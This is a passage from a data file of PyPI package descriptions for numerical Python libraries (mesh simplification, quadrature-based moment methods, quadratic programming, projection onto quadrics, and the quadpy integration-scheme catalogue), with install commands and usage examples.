repositories that served as references during the development of this project:pyquadkey2"} +{"package": "quad-mesh-simplify", "pacakge-description": "Quadric mesh simplificationA leightweight package for simplifying a mesh containing node features. The algorithm fromSurface Simplification Using Quadric Error Metricswas implemented using cython.Only python versions >= 3.6 are supportedInstallationwith pip$pipinstallquad_mesh_simplifyfrom source if distribution is not supportedDownload this repository and build the package by running:$pipinstall-rrequirements.txt\n$pythonsetup.pybuild_ext--inplace\n$pipinstall.UsageThis package provides one simple function to reduce a given mesh. This can be done for simple meshes or meshes with vertex features.simplify_mesh(positions, face, num_nodes, features=None, threshold=0., max_err=np.Infinity)positions(numpy array): array of shape [num_nodes x 3] containing the x, y, z position for each nodeface(numpy array): array of shape [num_faces x 3] containing the indices for each triangular facenum_nodes(int): number of nodes that the final mesh will have\nthreshold (number, optional): threshold of vertices distance to be a valid pairfeatures(numpy array): features for all nodes [num_nodes x feature_length]threshold(double): if the distance between two vertices is below this threshold, they are considered as valid pairs that can be merged.max_err(double): no vertices are merged that have an error higher than this number. 
IMPORTANT: if provided it is not guaranteed that the output will have less than num_nodes vertices.Returns:new_positions, new_face, (new_features)Reduce a simple meshfromquad_mesh_simplifyimportsimplify_meshnew_positions,new_face=simplify_mesh(positions,face,)Reduce a mesh with vertex featuresfromquad_mesh_simplifyimportsimplify_meshnew_positions,new_face=simplify_mesh(positions,face,,features=features)Reduce a mesh with a threshold for the minimal distancefromquad_mesh_simplifyimportsimplify_meshnew_positions,new_face=simplify_mesh(positions,face,,threshold=0.5)"} +{"package": "quadmoments", "pacakge-description": "No description available on PyPI."} +{"package": "quadmompy", "pacakge-description": "QuadMomPy is a library for all sorts of fun with moments, Gaussian quadratures, orthogonal polynomials and quadrature-based moment methods for the solution of spatially homogeneous population balance equations.InstallationThe QuadMomPy package can be easily installed bypip install quadmompyor from the project repositorypip install -e .A comprehensive documentation and additional examples are only available in the project repository on GitLab/GitHub. Usegit clone https://gitlab.com/puetzm/quadmompy.gitto clone the code from the GitLab repository orgit clone https://github.com/puetzmi/quadmompy.gitto clone from the project mirror on GitHub.The repository also includes aDockerfileto run tests and use the QuadMomPy package in a docker image.UsageA simple example of a moment inversion using the quadrature method of moments with the Wheeler algorithm to compute a Gaussian quadrature rule from a set of moments is given below.importnumpyasnpfromquadmompyimportqbmmfromquadmompy.qbmm.univariateimportQmomfromquadmompy.core.inversionimportWheeler# Create Qmom object using the Wheeler# algorithm for moment inversionqmom=qbmm.new(qbmm_type=Qmom,qbmm_setup={'inv_type':Wheeler})# Nodes `x` and weights `w` of a weighted# sum of degenerate distributionsx=np.array([-0.5,0.1,1.,1.4])w=np.array([0.15,0.4,0.4,0.05])# Compute moments of the distributionn=len(x)moments=np.vander(x,2*n).T[::-1]@w# Invert moments to obtain quadrature nodes and# weights, which should, in this particular# equal the nodes and weights defined above.x_quad,w_quad=qmom.moment_inversion(moments)print(f\"x ={x_quad}\")print(f\"w ={w_quad}\")For more examples of how to use the numerous classes provided with this package, see thetestsdirectory and theexamplesdirectory in the project repository on GitLab (https://gitlab.com/puetzm/quadmompy.git) and the project mirror on GitHub(https://github.com/puetzmi/quadmompy.git).LicenseCopyright (c) 2022 Michele Puetz.This program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, version 3.This program is distributed in the hope that it will be useful, but\nWITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\nGeneral Public License for more details.You should have received a copy of the GNU General Public License\nalong with this program. If not, see ."} +{"package": "quadprog", "pacakge-description": "Minimize 1/2 x^T G x - a^T xSubject to C.T x >= bThis routine uses the the Goldfarb/Idnani dual algorithm [1].ReferencesD. Goldfarb and A. Idnani (1983). 
A numerically stable dual\nmethod for solving strictly convex quadratic programs.\nMathematical Programming, 27, 1-33."} +{"package": "quadprog-wheel", "pacakge-description": "Minimize 1/2 x^T G x - a^T xSubject to C.T x >= bThis routine uses the the Goldfarb/Idnani dual algorithm [1].ReferencesD. Goldfarb and A. Idnani (1983). A numerically stable dual\nmethod for solving strictly convex quadratic programs.\nMathematical Programming, 27, 1-33."} +{"package": "quadproj", "pacakge-description": "quadprojA simple library to project a point onto a quadratic surface, orquadric.How to install quadproj?It is a one-liner!python3-mpipinstallquadprojSeeinstallation pagefor further information and the requirements.DocumentationThe documentation is hosted on GitLab:https://loicvh.gitlab.io/quadprojHow does quadproj works?The projection is obtained by computing exhaustively all KKT point from the optimization problem defining the projection. The authors of[1]show that for non-cylindrical central quadrics, the solutions belong to the KKT points that consist in the intersection between:a unique root of a nonlinear function on a specific interval;a set of closed-form points.Either set can be empty but for a nonempty quadric, at least one is nonempty and contains (one of the) projections.The full explanation is provided in[1].How to use quadproj?See thequickstartpage or theAPI documentation.DependenciesSeerequirements.txt.[1](2021) L. Van Hoorebeeck, P.-A. Absil and A. Papavasiliou, \u201cProjection onto quadratic hypersurfaces\u201d, submitted. (preprint,abstract/BibTex)"} +{"package": "quadpy", "pacakge-description": "Your one-stop shop for numerical integration in Python.More than 1500 numerical integration schemes forline segments,circles,disks,triangles,quadrilaterals,spheres,balls,tetrahedra,hexahedra,wedges,pyramids,n-spheres,n-balls,n-cubes,n-simplices,the 1D half-space with weight functions exp(-r),the 2D space with weight functions exp(-r),the 3D space with weight functions exp(-r),the nD space with weight functions exp(-r),the 1D space with weight functions exp(-r2),the 2D space with weight functions exp(-r2),the 3D space with weight functions exp(-r2),\nandthe nD space with weight functions exp(-r2),\nfor fast integration of real-, complex-, and vector-valued functions.InstallationInstall quadpyfrom PyPIwithpip install quadpySeehereon how to get a license.Using quadpyQuadpy provides integration schemes for many different 1D, 2D, even nD domains.To start off easy: If you'd numerically integrate any function over any given\n1D interval, doimportnumpyasnpimportquadpydeff(x):returnnp.sin(x)-xval,err=quadpy.quad(f,0.0,6.0)This is likescipywith the addition that quadpy handles complex-, vector-, matrix-valued integrands,\nand \"intervals\" in spaces of arbitrary dimension.To integrate over atriangle, doimportnumpyasnpimportquadpydeff(x):returnnp.sin(x[0])*np.sin(x[1])triangle=np.array([[0.0,0.0],[1.0,0.0],[0.7,0.5]])# get a \"good\" scheme of degree 10scheme=quadpy.t2.get_good_scheme(10)val=scheme.integrate(f,triangle)Most domains haveget_good_scheme(degree). 
If you would like to use a\nparticular scheme, you can pick one from the dictionaryquadpy.t2.schemes.All schemes havescheme.pointsscheme.weightsscheme.degreescheme.sourcescheme.test_tolerancescheme.show()scheme.integrate(# ...)and many havescheme.points_symbolicscheme.weights_symbolicYou can explore schemes on the command line with, e.g.,quadpy info s2 rabinowitz_richter_3\n name: Rabinowitz-Richter 2\n source: Perfectly Symmetric Two-Dimensional Integration Formulas with Minimal Numbers of Points\n Philip Rabinowitz, Nira Richter\n Mathematics of Computation, vol. 23, no. 108, pp. 765-779, 1969\n https://doi.org/10.1090/S0025-5718-1969-0258281-4\n degree: 9\n num points/weights: 21\n max/min weight ratio: 7.632e+01\n test tolerance: 9.417e-15\n point position: outside\n all weights positive: TrueAlso tryquadpy show!quadpy is fully vectorized, so if you like to compute the integral of a function on many\ndomains at once, you can provide them all in oneintegrate()call, e.g.,# shape (3, 5, 2), i.e., (corners, num_triangles, xy_coords)triangles=np.stack([[[0.0,0.0],[1.0,0.0],[0.0,1.0]],[[1.2,0.6],[1.3,0.7],[1.4,0.8]],[[26.0,31.0],[24.0,27.0],[33.0,28]],[[0.1,0.3],[0.4,0.4],[0.7,0.1]],[[8.6,6.0],[9.4,5.6],[7.5,7.4]],],axis=-2,)The same goes for functions with vectorized output, e.g.,deff(x):return[np.sin(x[0]),np.sin(x[1])]More examples undertest/examples_test.py.Read more about the dimensionality of the input/output arraysin the\nwiki.Advanced topics:Adaptive quadratureCreating your own Gauss schemetanh-sinh quadratureSchemesLine segment (C1)Chebyshev-Gauss (type 1 and 2, arbitrary degree)Clenshaw-Curtis (arbitrary degree)Fej\u00e9r (type 1 and 2, arbitrary degree)Gauss-Jacobi (arbitrary degree)Gauss-Legendre (arbitrary degree)Gauss-Lobatto (arbitrary degree)Gauss-Kronrod (arbitrary degree)Gauss-Patterson (9 nested schemes up to degree 767)Gauss-Radau (arbitrary degree)Newton-Cotes (open and closed, arbitrary degree)See\nherefor how to generate Gauss formulas for your own weight functions.Example:importnumpyasnpimportquadpyscheme=quadpy.c1.gauss_patterson(5)scheme.show()val=scheme.integrate(lambdax:np.exp(x),[0.0,1.0])1D half-space with weight function exp(-r) (E1r)Generalized Gauss-LaguerreExample:importquadpyscheme=quadpy.e1r.gauss_laguerre(5,alpha=0)scheme.show()val=scheme.integrate(lambdax:x**2)1D space with weight function exp(-r2) (E1r2)Gauss-Hermite (arbitrary degree)Genz-Keister (1996, 8 nested schemes up to degree 67)Example:importquadpyscheme=quadpy.e1r2.gauss_hermite(5)scheme.show()val=scheme.integrate(lambdax:x**2)Circle (U2)Krylov (1959, arbitrary degree)Example:importnumpyasnpimportquadpyscheme=quadpy.u2.get_good_scheme(7)scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[0.0,0.0],1.0)Triangle (T2)Apart from the classical centroid, vertex, and seven-point schemes we haveHammer-Marlowe-Stroud(1956, 5 schemes up to\ndegree 5)Albrecht-Collatz(1958, degree 3)Stroud(1971, conical product scheme of degree 7)Franke(1971, 2 schemes of degree 7)Strang-Fix/Cowper(1973, 10 schemes up to degree\n7),Lyness-Jespersen(1975, 21 schemes up to degree 11,\ntwo of which are used inTRIEX),Lether(1976, degree 2n-2, arbitrary n, not symmetric),Hillion(1977, 10 schemes up to degree 3),Laursen-Gellert(1978, 17 schemes up to degree 10),CUBTRI(Laurie, 1982, degree 8),Dunavant(1985, 20 schemes up to degree 20),Cools-Haegemans(1987, degrees 8 and 11),Gatermann(1988, degree 7)Berntsen-Espelid(1990, 4 schemes of degree 13, the\nfirst one beingDCUTRI),Liu-Vinokur(1998, 13 schemes up to degree 
5),Griener-Schmid, (1999, 2 schemes of degree 6),Walkington(2000, 5 schemes up to degree 5),Wandzura-Xiao(2003, 6 schemes up to degree 30),Taylor-Wingate-Bos(2005, 5 schemes up to degree\n14),Zhang-Cui-Liu(2009, 3 schemes up to degree 20),Xiao-Gimbutas(2010, 50 schemes up to degree 50),Vioreanu-Rokhlin(2014, 20 schemes up to degree 62),Williams-Shunn-Jameson(2014, 8 schemes up to\ndegree 12),Witherden-Vincent(2015, 19 schemes up to degree 20),Papanicolopulos(2016, 27 schemes up to degree 25),all schemes for the n-simplex.Example:importnumpyasnpimportquadpyscheme=quadpy.t2.get_good_scheme(12)scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[[0.0,0.0],[1.0,0.0],[0.5,0.7]])Disk (S2)Radon (1948, degree 5)Peirce (1956, 3 schemes up to degree 11)Peirce (1957, arbitrary degree)Albrecht-Collatz (1958, degree 3)Hammer-Stroud (1958, 8 schemes up to degree 15)Albrecht (1960, 8 schemes up to degree 17)Mysovskih (1964, 3 schemes up to degree 15)Rabinowitz-Richter (1969, 6 schemes up to degree 15)Lether (1971, arbitrary degree)Piessens-Haegemans (1975, 1 scheme of degree 9)Haegemans-Piessens (1977, degree 9)Cools-Haegemans (1985, 4 schemes up to degree 13)Wissmann-Becker (1986, 3 schemes up to degree 8)Kim-Song (1997, 15 schemes up to degree 17)Cools-Kim (2000, 3 schemes up to degree 21)Luo-Meng (2007, 6 schemes up to degree 17)Takaki-Forbes-Rolland (2022, 19 schemes up to degree 77)all schemes from the n-ballExample:importnumpyasnpimportquadpyscheme=quadpy.s2.get_good_scheme(6)scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[0.0,0.0],1.0)Quadrilateral (C2)Maxwell(1890, degree 7)Burnside(1908, degree 5)Irwin(1923, 3 schemes up to degree 5)Tyler(1953, 3 schemes up to degree 7)Hammer-Stroud(1958, 3 schemes up to degree 7)Albrecht-Collatz(1958, 4 schemes up to degree 5)Miller(1960, degree 1, degree 11 for harmonic integrands)Meister(1966, degree 7)Phillips(1967, degree 7)Rabinowitz-Richter(1969, 6 schemes up to degree 15)Franke(1971, 10 schemes up to degree 9)Piessens-Haegemans(1975, 2 schemes of degree 9)Haegemans-Piessens(1977, degree 7)Schmid(1978, 3 schemes up to degree 6)Cools-Haegemans(1985, 6 schemes up to degree 17)Dunavant(1985, 11 schemes up to degree 19)Morrow-Patterson(1985, 2 schemes up to degree 20, single precision)Cohen-Gismalla, (1986, 2 schemes up to degree 3)Wissmann-Becker(1986, 6 schemes up to degree 8)Cools-Haegemans(1988, 2 schemes up to degree 13)Waldron(1994, infinitely many schemes of degree 3)Sommariva(2012, 55 schemes up to degree 55)Witherden-Vincent(2015, 11 schemes up to degree 21)products of line segment schemesall schemes from the n-cubeExample:importnumpyasnpimportquadpyscheme=quadpy.c2.get_good_scheme(7)val=scheme.integrate(lambdax:np.exp(x[0]),[[[0.0,0.0],[1.0,0.0]],[[0.0,1.0],[1.0,1.0]]],)The points are specified in an array of shape (2, 2, ...) such thatarr[0][0]is the lower left corner,arr[1][1]the upper right. 
If your c2\nhas its sides aligned with the coordinate axes, you can use the convenience\nfunctionquadpy.c2.rectangle_points([x0,x1],[y0,y1])to generate the array.2D space with weight function exp(-r) (E2r)Stroud-Secrest(1963, 2 schemes up to degree 7)Rabinowitz-Richter(1969, 4 schemes up to degree 15)Stroud(1971, degree 4)Haegemans-Piessens(1977, 2 schemes up to degree 9)Cools-Haegemans(1985, 3 schemes up to degree 13)all schemes from the nD space with weight function exp(-r)Example:importquadpyscheme=quadpy.e2r.get_good_scheme(5)scheme.show()val=scheme.integrate(lambdax:x[0]**2)2D space with weight function exp(-r2) (E2r2)Stroud-Secrest(1963, 2 schemes up to degree 7)Rabinowitz-Richter(1969, 5 schemes up to degree 15)Stroud(1971, 3 schemes up to degree 7)Haegemans-Piessens(1977, 2 schemes of degree 9)Cools-Haegemans(1985, 3 schemes up to degree 13)Van Zandt (2019, degree 6)all schemes from the nD space with weight function exp(-r2)Example:importquadpyscheme=quadpy.e2r2.get_good_scheme(3)scheme.show()val=scheme.integrate(lambdax:x[0]**2)Sphere (U3)Albrecht-Collatz(1958, 5 schemes up to degree 7)McLaren(1963, 10 schemes up to degree 14)Lebedev(1976, 34 schemes up to degree 131)Ba\u017eant-Oh(1986, 3 schemes up to degree 13)Heo-Xu(2001, 27 schemes up to degree 39)Fliege-Maier(2007, 4 schemes up to degree 4,\nsingle-precision)all schemes from the n-sphereExample:importnumpyasnpimportquadpyscheme=quadpy.u3.get_good_scheme(19)# scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[0.0,0.0,0.0],1.0)Integration on the sphere can also be done for functions defined in spherical\ncoordinates:importnumpyasnpimportquadpydeff(theta_phi):theta,phi=theta_phireturnnp.sin(phi)**2*np.sin(theta)scheme=quadpy.u3.get_good_scheme(19)val=scheme.integrate_spherical(f)Ball (S3)Ditkin(1948, 3 schemes up to degree 7)Hammer-Stroud(1958, 6 schemes up to degree 7)Mysovskih(1964, degree 7)Stroud(1971, 2 schemes up to degree 14)Van Zandt (2020, degree 4)all schemes from the n-ballExample:importnumpyasnpimportquadpyscheme=quadpy.s3.get_good_scheme(4)# scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[0.0,0.0,0.0],1.0)Tetrahedron (T3)Hammer-Marlowe-Stroud(1956, 3 schemes up to degree 3, also appearing inHammer-Stroud)Stroud(1971, degree 7)Yu(1984, 5 schemes up to degree 6)Keast(1986, 10 schemes up to degree 8)Beckers-Haegemans(1990, degrees 8 and 9)Gatermann(1992, degree 5)Liu-Vinokur(1998, 14 schemes up to degree 5)Walkington(2000, 6 schemes up to degree 7)Zhang-Cui-Liu(2009, 2 schemes up to degree 14)Xiao-Gimbutas(2010, 15 schemes up to degree 15)Shunn-Ham(2012, 6 schemes up to degree 7)Vioreanu-Rokhlin(2014, 10 schemes up to degree 13)Williams-Shunn-Jameson(2014, 1 scheme with\ndegree 9)Witherden-Vincent(2015, 9 schemes up to degree 10)Ja\u015bkowiec-Sukumar(2020, 21 schemes up to degree 20)all schemes for the n-simplex.Example:importnumpyasnpimportquadpyscheme=quadpy.t3.get_good_scheme(5)# scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[[0.0,0.0,0.0],[1.0,0.0,0.0],[0.5,0.7,0.0],[0.3,0.9,1.0]],)Hexahedron (C3)Sadowsky(1940, degree 5)Tyler(1953, 2 schemes up to degree 5)Hammer-Wymore(1957, degree 7)Albrecht-Collatz(1958, degree 3)Hammer-Stroud(1958, 6 schemes up to degree 7)Mustard-Lyness-Blatt(1963, 6 schemes up to degree 5)Stroud(1967, degree 5)Sarma-Stroud(1969, degree 7)Witherden-Vincent(2015, 7 schemes up to degree degree 11)all schemes from the n-cubeProduct schemes derived from line segment schemesExample:importnumpyasnpimportquadpyscheme=quadpy.c3.product(quadpy.c1.newton_cotes_closed(3))# 
scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),quadpy.c3.cube_points([0.0,1.0],[-0.3,0.4],[1.0,2.1]),)Pyramid (P3)Felippa(2004, 9 schemes up to degree 5)Example:importnumpyasnpimportquadpyscheme=quadpy.p3.felippa_5()val=scheme.integrate(lambdax:np.exp(x[0]),[[0.0,0.0,0.0],[1.0,0.0,0.0],[0.5,0.7,0.0],[0.3,0.9,0.0],[0.0,0.1,1.0],],)Wedge (W3)Felippa(2004, 6 schemes up to degree 6)Kubatko-Yeager-Maggi(2013, 21 schemes up to\ndegree 9)Example:importnumpyasnpimportquadpyscheme=quadpy.w3.felippa_3()val=scheme.integrate(lambdax:np.exp(x[0]),[[[0.0,0.0,0.0],[1.0,0.0,0.0],[0.5,0.7,0.0]],[[0.0,0.0,1.0],[1.0,0.0,1.0],[0.5,0.7,1.0]],],)3D space with weight function exp(-r) (E3r)Stroud-Secrest(1963, 5 schemes up to degree 7)all schemes from the nD space with weight function\nexp(-r)Example:importquadpyscheme=quadpy.e3r.get_good_scheme(5)# scheme.show()val=scheme.integrate(lambdax:x[0]**2)3D space with weight function exp(-r2) (E3r2)Stroud-Secrest(1963, 7 schemes up to degree 7)Stroud(1971, scheme of degree 14)Van Zandt (2020, degree 4)all schemes from the nD space with weight function\nexp(-r2)Example:importquadpyscheme=quadpy.e3r2.get_good_scheme(6)# scheme.show()val=scheme.integrate(lambdax:x[0]**2)n-Simplex (Tn)Lauffer(1955, 5 schemes up to degree 5)Hammer-Stroud(1956, 3 schemes up to degree 3)Stroud(1964, degree 3)Stroud(1966, 7 schemes of degree 3)Stroud(1969, degree 5)Silvester(1970, arbitrary degree),Grundmann-M\u00f6ller(1978, arbitrary degree)Walkington(2000, 5 schemes up to degree 7)Example:importnumpyasnpimportquadpydim=4scheme=quadpy.tn.grundmann_moeller(dim,3)val=scheme.integrate(lambdax:np.exp(x[0]),np.array([[0.0,0.0,0.0,0.0],[1.0,2.0,0.0,0.0],[0.0,1.0,0.0,0.0],[0.0,3.0,1.0,0.0],[0.0,0.0,4.0,1.0],]),)n-Sphere (Un)Stroud(1967, degree 7)Stroud(1969, 3 <= n <= 16, degree 11)Stroud(1971, 6 schemes up to degree 5)Dobrodeev(1978, n >= 2, degree 5)Mysovskikh(1980, 2 schemes up to degree 5)Example:importnumpyasnpimportquadpydim=4scheme=quadpy.un.dobrodeev_1978(dim)val=scheme.integrate(lambdax:np.exp(x[0]),np.zeros(dim),1.0)n-Ball (Sn)Stroud(1957, degree 2)Hammer-Stroud(1958, 2 schemes up to degree 5)Stroud(1966, 4 schemes of degree 5)Stroud(1967, 4 <= n <= 7, 2 schemes of degree 5)Stroud(1967, n >= 3, 3 schemes of degree 7)Stenger(1967, 6 schemes up to degree 11)McNamee-Stenger(1967, 6 schemes up to degree 9)Dobrodeev(1970, n >= 3, degree 7)Dobrodeev(1978, 2 <= n <= 20, degree 5)Stoyanova(1997, n >= 5, degree 7)Example:importnumpyasnpimportquadpydim=4scheme=quadpy.sn.dobrodeev_1970(dim)val=scheme.integrate(lambdax:np.exp(x[0]),np.zeros(dim),1.0)n-Cube (Cn)Ewing(1941, degree 3)Tyler(1953, degree 3)Stroud(1957, 2 schemes up to degree 3)Hammer-Stroud(1958, degree 5)Mustard-Lyness-Blatt(1963, degree 5)Thacher(1964, degree 2)Stroud(1966, 4 schemes of degree 5)Phillips(1967, degree 7)McNamee-Stenger(1967, 6 schemes up to degree 9)Stroud(1968, degree 5)Dobrodeev(1970, n >= 5, degree 7)Dobrodeev(1978, n >= 2, degree 5)Cools-Haegemans(1994, 2 schemes up to degree 5)Example:importnumpyasnpimportquadpydim=4scheme=quadpy.cn.stroud_cn_3_3(dim)val=scheme.integrate(lambdax:np.exp(x[0]),quadpy.cn.ncube_points([0.0,1.0],[0.1,0.9],[-1.0,1.0],[-1.0,-0.5]),)nD space with weight function exp(-r) (Enr)Stroud-Secrest(1963, 4 schemes up to degree 5)McNamee-Stenger(1967, 6 schemes up to degree 9)Stroud(1971, 2 schemes up to degree 5)Example:importquadpydim=4scheme=quadpy.enr.stroud_enr_5_4(dim)val=scheme.integrate(lambdax:x[0]**2)nD space with weight function exp(-r2) (Enr2)Stroud-Secrest(1963, 4 schemes up to 
degree 5)McNamee-Stenger(1967, 6 schemes up to degree 9)Stroud(1967, 2 schemes of degree 5)Stroud(1967, 3 schemes of degree 7)Stenger(1971, 6 schemes up to degree 11, varying dimensionality restrictions)Stroud(1971, 5 schemes up to degree 5)Phillips(1980, degree 5)Cools-Haegemans(1994, 3 schemes up to degree 7)Lu-Darmofal(2004, degree 5)Xiu(2008, degree 2)Example:importquadpydim=4scheme=quadpy.enr2.stroud_enr2_5_2(dim)val=scheme.integrate(lambdax:x[0]**2)"} +{"package": "quadpy-gpl", "pacakge-description": "Your one-stop shop for numerical integration in Python.More than 1500 numerical integration schemes forline segments,circles,disks,triangles,quadrilaterals,spheres,balls,tetrahedra,hexahedra,wedges,pyramids,n-spheres,n-balls,n-cubes,n-simplices,the 1D half-space with weight functions exp(-r),the 2D space with weight functions exp(-r),the 3D space with weight functions exp(-r),the nD space with weight functions exp(-r),the 1D space with weight functions exp(-r2),the 2D space with weight functions exp(-r2),the 3D space with weight functions exp(-r2),\nandthe nD space with weight functions exp(-r2),\nfor fast integration of real-, complex-, and vector-valued functions.For example, to numerically integrate any function over any given interval, install\nquadpyfrom the Python Package Indexwithpip install quadpyand doimportnumpyasnpimportquadpydeff(x):returnnp.sin(x)-xval,err=quadpy.quad(f,0.0,6.0)This is likescipywith the addition that quadpy handles complex-, vector-, matrix-valued integrands,\nand \"intervals\" in spaces of arbitrary dimension.To integrate over atriangle, doimportnumpyasnpimportquadpydeff(x):returnnp.sin(x[0])*np.sin(x[1])triangle=np.array([[0.0,0.0],[1.0,0.0],[0.7,0.5]])# get a \"good\" scheme of degree 10scheme=quadpy.t2.get_good_scheme(10)val=scheme.integrate(f,triangle)Most domains haveget_good_scheme(degree). 
If you would like to use a particular\nscheme, you can pick one from the dictionaryquadpy.t2.schemes.All schemes havescheme.pointsscheme.weightsscheme.degreescheme.sourcescheme.test_tolerancescheme.show()scheme.integrate(# ...)and many havescheme.points_symbolicscheme.weights_symbolicquadpy is fully vectorized, so if you like to compute the integral of a function on many\ndomains at once, you can provide them all in oneintegrate()call, e.g.,# shape (3, 5, 2), i.e., (corners, num_triangles, xy_coords)triangles=np.stack([[[0.0,0.0],[1.0,0.0],[0.0,1.0]],[[1.2,0.6],[1.3,0.7],[1.4,0.8]],[[26.0,31.0],[24.0,27.0],[33.0,28]],[[0.1,0.3],[0.4,0.4],[0.7,0.1]],[[8.6,6.0],[9.4,5.6],[7.5,7.4]],],axis=-2,)The same goes for functions with vectorized output, e.g.,deff(x):return[np.sin(x[0]),np.sin(x[1])]More examples undertest/examples_test.py.Read more about the dimensionality of the input/output arraysin the\nwiki.Advanced topics:Adaptive quadratureCreating your own Gauss schemetanh-sinh quadratureSchemesLine segment (C1)Chebyshev-Gauss(type 1 and 2, arbitrary degree)Clenshaw-Curtis(arbitrary degree)Fej\u00e9r(type 1 and 2, arbitrary degree)Gauss-Jacobi(arbitrary degree)Gauss-Legendre(arbitrary degree)Gauss-Lobatto(arbitrary degree)Gauss-Kronrod(arbitrary degree)Gauss-Patterson(9 nested schemes up to degree 767)Gauss-Radau(arbitrary degree)Newton-Cotes(open and closed, arbitrary degree)See\nherefor how to generate Gauss formulas for your own weight functions.Example:importnumpyasnpimportquadpyscheme=quadpy.c1.gauss_patterson(5)scheme.show()val=scheme.integrate(lambdax:np.exp(x),[0.0,1.0])1D half-space with weight function exp(-r) (E1r)Generalized Gauss-LaguerreExample:importquadpyscheme=quadpy.e1r.gauss_laguerre(5,alpha=0)scheme.show()val=scheme.integrate(lambdax:x**2)1D space with weight function exp(-r2) (E1r2)Gauss-Hermite(arbitrary degree)Genz-Keister(1996, 8 nested schemes up to degree 67)Example:importquadpyscheme=quadpy.e1r2.gauss_hermite(5)scheme.show()val=scheme.integrate(lambdax:x**2)Circle (U2)Krylov(1959, arbitrary degree)Example:importnumpyasnpimportquadpyscheme=quadpy.u2.get_good_scheme(7)scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[0.0,0.0],1.0)Triangle (T2)Apart from the classical centroid, vertex, and seven-point schemes we haveHammer-Marlowe-Stroud(1956, 5 schemes up to\ndegree 5)Albrecht-Collatz(1958, degree 3)Stroud(1971, conical product scheme of degree 7)Franke(1971, 2 schemes of degree 7)Strang-Fix/Cowper(1973, 10 schemes up to degree\n7),Lyness-Jespersen(1975, 21 schemes up to degree 11,\ntwo of which are used inTRIEX),Lether(1976, degree 2n-2, arbitrary n, not symmetric),Hillion(1977, 10 schemes up to degree 3),Laursen-Gellert(1978, 17 schemes up to degree 10),CUBTRI(Laurie, 1982, degree 8),Dunavant(1985, 20 schemes up to degree 20),Cools-Haegemans(1987, degrees 8 and 11),Gatermann(1988, degree 7)Berntsen-Espelid(1990, 4 schemes of degree 13, the\nfirst one beingDCUTRI),Liu-Vinokur(1998, 13 schemes up to degree 5),Griener-Schmid, (1999, 2 schemes of degree 6),Walkington(2000, 5 schemes up to degree 5),Wandzura-Xiao(2003, 6 schemes up to degree 30),Taylor-Wingate-Bos(2005, 5 schemes up to degree\n14),Zhang-Cui-Liu(2009, 3 schemes up to degree 20),Xiao-Gimbutas(2010, 50 schemes up to degree 50),Vioreanu-Rokhlin(2014, 20 schemes up to degree 62),Williams-Shunn-Jameson(2014, 8 schemes up to\ndegree 12),Witherden-Vincent(2015, 19 schemes up to degree 20),Papanicolopulos(2016, 27 schemes up to degree 25),all schemes for the 
n-simplex.Example:importnumpyasnpimportquadpyscheme=quadpy.t2.get_good_scheme(12)scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[[0.0,0.0],[1.0,0.0],[0.5,0.7]])Disk (S2)Radon(1948, degree 5)Peirce(1956, 3 schemes up to degree 11)Peirce(1957, arbitrary degree)Albrecht-Collatz(1958, degree 3)Hammer-Stroud(1958, 8 schemes up to degree 15)Albrecht(1960, 8 schemes up to degree 17)Mysovskih(1964, 3 schemes up to degree 15)Rabinowitz-Richter(1969, 6 schemes up to degree 15)Lether(1971, arbitrary degree)Piessens-Haegemans(1975, 1 scheme of degree 9)Haegemans-Piessens(1977, degree 9)Cools-Haegemans(1985, 4 schemes up to degree 13)Wissmann-Becker(1986, 3 schemes up to degree 8)Kim-Song(1997, 15 schemes up to degree 17)Cools-Kim(2000, 3 schemes up to degree 21)Luo-Meng(2007, 6 schemes up to degree 17)all schemes from the n-ballExample:importnumpyasnpimportquadpyscheme=quadpy.s2.get_good_scheme(6)scheme.show()val=scheme.integrate(lambdax:np.exp(x[0]),[0.0,0.0],1.0)Quadrilateral (C2)Maxwell(1890, degree 7)Burnside(1908, degree 5)Irwin(1923, 3 schemes up to degree 5)Tyler(1953, 3 schemes up to degree 7)Hammer-Stroud(1958, 3 schemes up to degree 7)Albrecht-Collatz(1958, 4 schemes up to degree 5)Miller(1960, degree 1, degree 11 for harmonic integrands)Meister(1966, degree 7)Phillips(1967, degree 7)Rabinowitz-Richter(1969, 6 schemes up to degree 15)Franke(1971, 10 schemes up to degree 9)Piessens-Haegemans(1975, 2 schemes of degree 9)Haegemans-Piessens(1977, degree 7)Schmid(1978, 3 schemes up to degree 6)Cools-Haegemans(1985, 6 schemes up to degree 17)Dunavant(1985, 11 schemes up to degree 19)Morrow-Patterson(1985, 2 schemes up to degree 20, single precision)Cohen-Gismalla, (1986, 2 schemes up to degree 3)Wissmann-Becker(1986, 6 schemes up to degree 8)Cools-Haegemans(1988, 2 schemes up to degree 13)Waldron(1994, infinitely many schemes of degree 3)Sommariva(2012, 55 schemes up to degree 55)Witherden-Vincent(2015, 11 schemes up to degree 21)products of line segment schemesall schemes from the n-cubeExample:importnumpyasnpimportquadpyscheme=quadpy.c2.get_good_scheme(7)val=scheme.integrate(lambdax:np.exp(x[0]),[[[0.0,0.0],[1.0,0.0]],[[0.0,1.0],[1.0,1.0]]],)The points are specified in an array of shape (2, 2, ...) such thatarr[0][0]is the lower left corner,arr[1][1]the upper right. 
